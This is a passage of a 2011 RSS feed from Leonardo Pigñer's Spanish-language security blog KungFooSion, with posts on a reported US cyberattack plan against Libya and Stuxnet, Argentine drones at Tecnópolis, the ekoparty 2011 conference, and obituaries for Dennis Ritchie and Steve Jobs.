&lt;li&gt;Los usuarios del software podrían utilizarlo sin temor a ser descubiertos por adversarios con conocimientos sofisticados.&lt;a href="http://www.dailymail.co.uk/news/article-1367535/U-S-military-using-fake-online-profiles-spread-propaganda.html"&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
REFERENCIAS:&lt;br /&gt;
- &lt;a href="http://www.washingtonpost.com/blogs/innovations/post/report-america-should-like-latin-americas-friend-ing-social-media/2011/09/13/gIQAjdoAML_blog.html"&gt;Washington Post: U.S. should ‘like’ Latin America’s ‘friend’-ing social media&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.washingtonpost.com/wp-srv/national/documents/meacham-report.html"&gt;Report: Latin American governments need to 'friend' social media and technology &lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.youtube.com/watch?v=zxlixI6jJEs"&gt;Libya fake Twitter ID explosion part of 'cyber war for democracy'? &lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.dailymail.co.uk/news/article-1367535/U-S-military-using-fake-online-profiles-spread-propaganda.html"&gt;Combating jihadists and free speech: How the U.S. military is using fake online profiles to spread propaganda&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.guardian.co.uk/technology/2011/mar/17/us-spy-operation-social-networks"&gt;Revealed: US spy operation that manipulates social media&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;  //  Seguime en Twitter: &lt;a href="http://twitter.com/#%21/@KFS"&gt;@KFS&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2537232728172637273?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/iVIhD1rkueE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/iVIhD1rkueE/redes-sociales-para-ciberpropaganda-en.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/--uiVwYf3ybg/Tq8AEPV40LI/AAAAAAAAF3I/3zqo62rwZB8/s72-c/arab_facebook.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/10/redes-sociales-para-ciberpropaganda-en.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-4192096230873578066</guid><pubDate>Thu, 20 Oct 2011 06:02:00 +0000</pubDate><atom:updated>2011-11-12T00:01:50.240-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ciberguerra</category><title>¿Ciberguerra a Libia?</title><description>&lt;div style="text-align: justify;"&gt;Un reciente &lt;a href="http://www.nytimes.com/2011/10/18/world/africa/cyber-warfare-against-libya-was-debated-by-us.html"&gt;artículo del New York Times&lt;/a&gt; reporta que el gobierno de EEUU consideró lanzar una ciberataque contra Libia.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ySI7ryzCql8/Tp-4AphG-yI/AAAAAAAAF1k/Ny5h9JEMEHI/s1600/ciberguerra_eeuu_libia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-ySI7ryzCql8/Tp-4AphG-yI/AAAAAAAAF1k/Ny5h9JEMEHI/s400/ciberguerra_eeuu_libia.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Dice el NYT, que previamente a los ataques aéreos realizados por EEUU en Marzo, el gobierno de este país consideró lanzar un ciberataque para dañar los enlaces de comunicaciones militares, y que estos no puedan dar aviso a las baterías de misiles, sobre los ataques que luego realizarían los aliados de la OTAN. &lt;br /&gt;
&lt;br /&gt;
Curiosamente, este artículo publicado el 17 de Octubre por el New York Times, sobre&amp;nbsp; ataques aéreos a Libia que se realizaron en Marzo, llega mientras las redes militares de EEUU se encuentran en el ojo de la tormenta, por el &lt;a href="http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/"&gt;artículo de Wired&lt;/a&gt; del 7 de Octubre, donde daba a conocer que un virus infecto toda la flota de aviones no tripulados que actualmente se utiliza en Medio Oriente para tareas de inteligencia y ataques aéreos.&lt;br /&gt;
&lt;br /&gt;
La nota del NYT continúa, comentando los cuestionamientos que surgieron sobre precedentes que un ataque como este podría generar, especialmente para Rusia y China. También, sobre si el presidente Obama podría proceder con un ataque como este sin informar al Congreso.&lt;br /&gt;
&lt;br /&gt;
Si bien todos conocemos &lt;i&gt;"precedentes"&lt;/i&gt; como la Operación Aurora o Stuxnet, hasta ahora ningún gobierno admitió estar detrás de un ciberataque a otro país. Por otro lado, la aprobación del ciberataque por parte del Congreso es bastante curiosa, porque tampoco se solicito autorización para realizar los ataques aéreos en un primer lugar, según otro &lt;a href="http://www.nytimes.com/2011/03/22/world/africa/22libya.html"&gt;artículo del New York&lt;/a&gt; Times en Marzo.&lt;br /&gt;
&lt;br /&gt;
Continúa el NYT preguntándose, en que situación los EEUU debería utilizar un ciberataque, y hace mención al posible origen norteamericano-israelí de Stuxnet. Un poco más adelante en el artículo, nos encontramos con una frase por demás interesante: &lt;br /&gt;
&lt;br /&gt;
“These cybercapabilities are still like the Ferrari that you keep in the garage and only take out for the big race and not just for a run around town, unless nothing else can get you there,”&lt;br /&gt;
&lt;br /&gt;
No hay dudas de que la Ferrari dio un paseo por Irán. Hay una charla muy interesante en TED de &lt;a href="http://www.ted.com/talks/ralph_langner_cracking_stuxnet_a_21st_century_cyberweapon.html"&gt;Ralph Langner sobre Stuxnet&lt;/a&gt;, donde al final de su exposición lanza dos frases bastante contundentes:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;"My opinion is that Mossad is involved."&lt;/i&gt; y luego, &lt;i&gt;"There is only one leading source, and that is the United States."&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
El artículo del NYT continúa sobre dudas respecto a si un ciberataque se puede adaptar a las leyes de guerra actuales de los EEUU, o necesitaría de un tratamiento diferente, y si es recomendable dejar conocer cuales son las&amp;nbsp; capacidades de ciberguerra que este país posee.&lt;br /&gt;
&lt;br /&gt;
Finalmente el ciberataque no se realizo, pero la red de defensa aérea de Libia fue seriamente dañada mediante ataques convencionales.&lt;br /&gt;
&lt;br /&gt;
Un artículo muy interesante del New York Times, recomendado!&lt;/div&gt;&lt;br /&gt;
REFERENCIAS:&lt;br /&gt;
- &lt;a href="http://www.nytimes.com/2011/10/18/world/africa/cyber-warfare-against-libya-was-debated-by-us.html"&gt;NYT: U.S. Debated Cyberwarfare in Attack Plan on Libya&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/"&gt;WIRED: Computer Virus Hits U.S. Drone Fleet&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.nytimes.com/2011/03/22/world/africa/22libya.html"&gt;NYT: U.S.-Led Assault Nears Goal in Libya&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.ted.com/talks/ralph_langner_cracking_stuxnet_a_21st_century_cyberweapon.html"&gt;TED: Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.defensenews.com/story.php?i=7990756"&gt;Virus Incident Sheds Light On U.S. Cyber Defense&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2010/01/estallo-la-cyberguerra.html"&gt;KUNGFOOSION: Estalló la CyberGuerra!&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-4192096230873578066?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/kT5NzivWTj0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/kT5NzivWTj0/ciberguerra-libia.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-ySI7ryzCql8/Tp-4AphG-yI/AAAAAAAAF1k/Ny5h9JEMEHI/s72-c/ciberguerra_eeuu_libia.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/10/ciberguerra-libia.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-8087272897966540681</guid><pubDate>Thu, 13 Oct 2011 02:59:00 +0000</pubDate><atom:updated>2011-10-13T00:05:23.996-03:00</atom:updated><title>Dennis Ritchie: 09/09/1941 - 12/10/2011</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-sDH419cTTAQ/TpZVK3WcYkI/AAAAAAAAF1A/VUPvK3H6vQM/s1600/ndennis_ritchie6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="385" src="http://2.bp.blogspot.com/-sDH419cTTAQ/TpZVK3WcYkI/AAAAAAAAF1A/VUPvK3H6vQM/s400/ndennis_ritchie6.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://www.kungfoosion.com/"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-8087272897966540681?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/681kcmEdFog" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/681kcmEdFog/dennis-ritchie-09091941-12102011.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-sDH419cTTAQ/TpZVK3WcYkI/AAAAAAAAF1A/VUPvK3H6vQM/s72-c/ndennis_ritchie6.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/10/dennis-ritchie-09091941-12102011.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6733833967092164373</guid><pubDate>Thu, 06 Oct 2011 01:40:00 +0000</pubDate><atom:updated>2011-10-05T22:40:24.531-03:00</atom:updated><title>Steve Jobs: 24/02/1955 - 5/10/2011</title><description>&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/UF8uR6Z6KLc" width="420"&gt;&lt;/iframe&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6733833967092164373?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/DoX_EC8MVTI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/DoX_EC8MVTI/steve-jobs-24021955-5102011.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/UF8uR6Z6KLc/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/10/steve-jobs-24021955-5102011.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5514646608165388152</guid><pubDate>Tue, 04 Oct 2011 04:12:00 +0000</pubDate><atom:updated>2011-10-31T17:20:40.974-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">UAV</category><title>UAV's Argentinos en TECNÓPOLIS</title><description>&lt;div style="text-align: justify;"&gt;Los UAV's Argentinos están presentes en &lt;a href="http://tecnopolis.ar/"&gt;TECNÓPOLIS&lt;/a&gt;, en el pabellón Ai10:&amp;nbsp; &lt;i&gt;"Los Aviones No Tripulados de Argentina"&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Ok8dld8RZr8/ToqBXAmZVFI/AAAAAAAAFzg/YywkIEAnzB4/s1600/tecnopolis_aire.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="202" src="http://1.bp.blogspot.com/-Ok8dld8RZr8/ToqBXAmZVFI/AAAAAAAAFzg/YywkIEAnzB4/s400/tecnopolis_aire.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;a href="http://tecnopolis.ar/"&gt;TECNÓPOLIS&lt;/a&gt; es una megamuestra de ciencia, tecnología, industria y arte, que fue pensada para ser el final de las celebraciones del Bicentenario de Argentina. La exhibición cuenta con más de 100 stands que están organizados en cinco continentes: Agua, Tierra, Aire, Fuego e Imaginación. En el continente Aire, podemos encontrar el pabellón Ai10 con "Los Aviones No Tripulados de Argentina".&lt;/div&gt;&lt;br /&gt;
Previamente ya había escrito sobre UAV's, y los desarrollos que podemos encontrar en Argentina, pero hasta TECNÓPOLIS, nunca había tenido la oportunidad de estar cerca de estos aparatos.&lt;br /&gt;
&lt;br /&gt;
Posts anteriores:&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2010/05/helicoptero-radio-controlado-con-video.html"&gt;Helicóptero Radio Controlado con Video de Alta Definición&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/12/uavs-en-argentina.html"&gt;UAVs en Argentina&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/12/mas-facil-que-capturar-video-de-aviones.html"&gt;Más Fácil que Capturar Video de Aviones Espía&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Dentro de los UAV's militares, podemos encontrar los famosos &lt;b&gt;&lt;i&gt;"Guardián"&lt;/i&gt;&lt;/b&gt; de la Armada, y &lt;b&gt;&lt;i&gt;"LIPAN"&lt;/i&gt;&lt;/b&gt; del Ejercito. Desde hace un tiempo, el Ejercito Argentino &lt;a href="http://www.inti.gov.ar/sabercomo/sc78/inti3.php"&gt;esta trabajando&lt;/a&gt; con el &lt;a href="http://www.inti.gov.ar/"&gt;INTI&lt;/a&gt;, para el desarrollo de un software para el seguimiento automático de antena para el LIPAN, y se espera dentro de poco el nuevo modelo XM4, que remplace al actual LIPAN M3.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-SfbknagCqes/ToqB2FzdxAI/AAAAAAAAFzk/CyXFVj7nV1E/s1600/armada_Guardian.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://2.bp.blogspot.com/-SfbknagCqes/ToqB2FzdxAI/AAAAAAAAFzk/CyXFVj7nV1E/s400/armada_Guardian.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Tampoco podía faltar la empresa privada mas representativa del desarrollo de UAV's en Argentina, Nostromo Defensa, presentando su nuevo UAV, el &lt;b&gt;&lt;i&gt;"CORBRA"&lt;/i&gt;&lt;/b&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rYFzpKbSWWU/ToqCZNLqa6I/AAAAAAAAFzo/NVHvE4iAfWA/s1600/kungfoosion.com_Cabure_Corbra.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://3.bp.blogspot.com/-rYFzpKbSWWU/ToqCZNLqa6I/AAAAAAAAFzo/NVHvE4iAfWA/s400/kungfoosion.com_Cabure_Corbra.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Las características principales del CORBRA son su gran capacidad de carga útil (payload), y su gran autonomía de vuelo, 16 horas. Esta diseñado como UAV de aplicaciones de monitoreo terrestres, con una carga útil de un sensor hiperespectral y un radar láser (LIDAR).&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rP4vFFC20Rs/ToqCsJCbinI/AAAAAAAAFzs/i5doFgJhm0k/s1600/kungfoosion.com_Nostromo_CORBRA.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="http://3.bp.blogspot.com/-rP4vFFC20Rs/ToqCsJCbinI/AAAAAAAAFzs/i5doFgJhm0k/s400/kungfoosion.com_Nostromo_CORBRA.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Algunas especificaciones del CORBRA: &lt;br /&gt;
- Peso Max al despegue : 150 kg&lt;br /&gt;
- Carga Util : 40 Kg&lt;br /&gt;
- Autonomía : 16 hs&lt;br /&gt;
- Alcance operativo : 150 km (LOS)&lt;br /&gt;
- Potencia : 28 HP&lt;br /&gt;
- Envergadura : 7 mts&lt;br /&gt;
- Largo : 4.5 Mts&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Es interesante observar, que desde hace algunos años, son varios los países de Latinoamérica que poseen desarrollos de UAV propios, aunque pocos han logrado introducirse con éxito en el mercado de UAV's mundial.&lt;br /&gt;
&lt;br /&gt;
La empresa cordobesa Nostrodomo Defensa, es un caso de éxito local, logrando vender sus desarrollos al USA DoD, entre otros. En otra escala,&amp;nbsp; la empresa israelí AEL Sistemas (Elbit Systems), uno de los líderes mundiales del mercado, llego a un acuerdo con la aeronáutica brasileña Embraer, para crear una empresa en Brasil para el desarrollo de UAV's.&lt;br /&gt;
&lt;br /&gt;
Según &lt;a href="http://tealgroup.com/index.php?option=com_content&amp;amp;view=article&amp;amp;id=62:uav-study-release&amp;amp;catid=3&amp;amp;Itemid=16"&gt;un estudio de Teal Group&lt;/a&gt;, el mercado mundial de UAV's, duplicará su gasto anual de 4,9 billones de dólares, a 11,5 billones, totalizando casi 80 billones en los próximos 10 años. Se estima que el mercado de UAV's, será la industria más dinámica dentro de la aeronáutica en los próximos años.&lt;br /&gt;
&lt;br /&gt;
Otro dato interesante, es que comienzan a nacer empresas que se dedican exclusivamente al desarrollo de payloads para UAV's, sin mencionar que no van a tardar en aparecer las soluciones Anti-UAV.&lt;br /&gt;
&lt;br /&gt;
Los también llamados "drones", han sido utilizados en Afganistán, Irak y recientemente en Libia, y sin dudas van a ser los actores principales de las futuras guerras. Si tomamos en cuenta los miles de millones de dólares que mueve esta industria, próximamente nos vamos a encontrar con avances tecnológicos muy importantes.&lt;br /&gt;
&lt;br /&gt;
Próximamente más artículos relacionados a TECNÓPOLIS, si todavía no fueron &lt;b&gt;se los recomiendo 100%!&lt;/b&gt;&amp;nbsp; &lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;REFERENCIAS:&lt;/b&gt;&lt;br /&gt;
- &lt;a href="http://tecnopolis.ar/"&gt;TECNÓPOLIS&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.nostromo-defensa.com/"&gt;Nostrodomo Defensa - UAV&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.inti.gov.ar/sabercomo/sc78/inti3.php"&gt;INTI - Nuevo software para naves no tripuladas&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.infodefensa.com/?noticia=embraer-y-ael-crean-la-compania-harpia-para-la-fabricacion-y-comercializacion-de-uav-en-brasil"&gt;Embraer y AEL crean la compañía Harpia para la fabricación y comercialización de UAV en Brasil&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2010/05/helicoptero-radio-controlado-con-video.html"&gt;Helicóptero Radio Controlado con Video de Alta Definición&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/12/uavs-en-argentina.html"&gt;UAVs en Argentina&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/12/mas-facil-que-capturar-video-de-aviones.html"&gt;Más Fácil que Capturar Video de Aviones Espía&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5514646608165388152?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/GPDe1ay7FZo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/GPDe1ay7FZo/uavs-argentinos-en-tecnopolis.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Ok8dld8RZr8/ToqBXAmZVFI/AAAAAAAAFzg/YywkIEAnzB4/s72-c/tecnopolis_aire.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/10/uavs-argentinos-en-tecnopolis.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-8057345671327576147</guid><pubDate>Sun, 25 Sep 2011 13:36:00 +0000</pubDate><atom:updated>2011-12-16T22:21:57.217-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ekoparty_2011</category><title>ekoparty 2011 - Join The Resistance!</title><description>&lt;div style="text-align: justify;"&gt;Increíblemente paso otra edición de la ekoparty, con muchísimas anécdotas e historias, tantas, que son casi imposibles de contar en un blog.&lt;br /&gt;
&lt;br /&gt;
Todos los años intentamos que la ekoparty tenga una "temática" diferente en su escenografía y en todo el merchandising. El año pasado tenía una temática "cyberpunk", y este año con tanto APT y Stuxnet, la temática elegida fue "cyberwarfare".&lt;br /&gt;
&lt;br /&gt;
En el badge de todos los asistentes, y en muchas de las camisetas del evento, aparecía la imagen de un robot asesino que venía a eliminar a los asistentes de la ekoparty. Debajo del robot decía lo siguiente:&lt;br /&gt;
&lt;br /&gt;
"We will never stop, until the humans are over, we don't know where you are ekoparty civilians, but we will find your headquarters and make you blow away"&lt;br /&gt;
&lt;br /&gt;
Por supuesto, la primer víctima del robot asesino era &lt;a href="http://twitter.com/@julianor"&gt;Juliano Rizzo&lt;/a&gt;, quien junto a &lt;a href="http://twitter.com/@thaidn"&gt;Thai Duong&lt;/a&gt;, iban a presentar &lt;i&gt;"BEAST: Surprising crypto attack against HTTPS"&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="326" src="http://www.youtube.com/embed/Mxm8JEUXOuQ" width="400"&gt;&lt;/iframe&gt; &lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Luego del robot asesino, Juliano y Thai, nuevamente la rompieron! realizaron una demostración en vivo en donde descifraban HTTPS, robaban cookies de una sesión de Paypal, y luego, hijackeaban la cuenta. INCREIBLE!&lt;br /&gt;
&lt;br /&gt;
A medida que la adrenalina vaya bajando, iré posteando más anécdotas, pero desde ya un enorme agradecimiento a todos por convertir a la ekoparty en la conferencia mas importante de seguridad en Latinoamérica, y según muchos conocedores dicen, una de las mejores del mundo. Gracias!&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;JOIN THE RESISTANCE!&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-8057345671327576147?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/jS0eMZXhI3U" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/jS0eMZXhI3U/ekoparty-2011-join-resistance.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/Mxm8JEUXOuQ/default.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/09/ekoparty-2011-join-resistance.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6620922831074578630</guid><pubDate>Sun, 18 Sep 2011 15:28:00 +0000</pubDate><atom:updated>2011-12-16T22:21:57.218-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ekoparty_2011</category><title>Ya llega la ekoparty 2011!</title><description>&lt;div style="text-align: justify;"&gt;A partir de mañana, comienza la semana de actividades de la edición 2011 de la ekoparty, una semana de locos…!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ekoparty.org/"&gt;&lt;img border="0" height="161" src="http://3.bp.blogspot.com/-Mr0xNWJfNgg/TnYNIafOLJI/AAAAAAAAFzA/lDYOmKfSckw/s400/ekoparty_Banner-456x184.png" width="400" /&gt;&lt;span id="goog_1757009006"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span id="goog_1757009007"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Ultimamente encuentro mucho mas dinámico el "microblogging" a través de Twitter, por lo que los invito a seguir mis tweets en &lt;a href="http://twitter.com/#%21/@kfs"&gt;&lt;b&gt;@KFS&lt;/b&gt;&lt;/a&gt;, para leer mi cobertura personal del evento, y por supuesto la cuenta oficial de &lt;a href="http://twitter.com/#%21/@ekoparty"&gt;&lt;b&gt;@EKOPARTY&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Este blog se ha reinventado varias veces, de acuerdo a los intereses que he tenido a lo largo del tiempo, comenzó dedicado al análisis forense, luego paso al pentest, muchas cosas personales, cosas de BASE4, y creo que próximamente va a tener un nuevo giro en su temática, estoy seguro que les va a gustar… ;-)&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Recuerden seguir los tweets de &lt;a href="http://twitter.com/#%21/@kfs"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;@KFS&lt;/span&gt;&lt;/b&gt;&lt;/a&gt; y &lt;a href="http://twitter.com/#%21/@ekoparty"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;@EKOPARTY&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;, y nos vemos la semana que viene!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6620922831074578630?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/DFEWwxHc2oU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/DFEWwxHc2oU/ya-llega-la-ekoparty-2011.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Mr0xNWJfNgg/TnYNIafOLJI/AAAAAAAAFzA/lDYOmKfSckw/s72-c/ekoparty_Banner-456x184.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/09/ya-llega-la-ekoparty-2011.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7002940821675484908</guid><pubDate>Wed, 20 Jul 2011 18:49:00 +0000</pubDate><atom:updated>2011-07-20T15:49:10.833-03:00</atom:updated><title>#1HackParaLosChicos - Jornada Solidaria</title><description>&lt;div style="text-align: justify;"&gt;El próximo 26 de Julio de 2011, tendrá lugar la jornada solidaria &lt;b&gt;&lt;a href="http://1hackparaloschicos.org/"&gt;#1HackParaLosChicos&lt;/a&gt;&lt;/b&gt;, enterate como participar!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-LHZQec4UhkY/TichBdhH_RI/AAAAAAAAFyY/vH7Ya2Bz1J0/s1600/1hackparaloschicos.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="85" src="http://3.bp.blogspot.com/-LHZQec4UhkY/TichBdhH_RI/AAAAAAAAFyY/vH7Ya2Bz1J0/s320/1hackparaloschicos.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
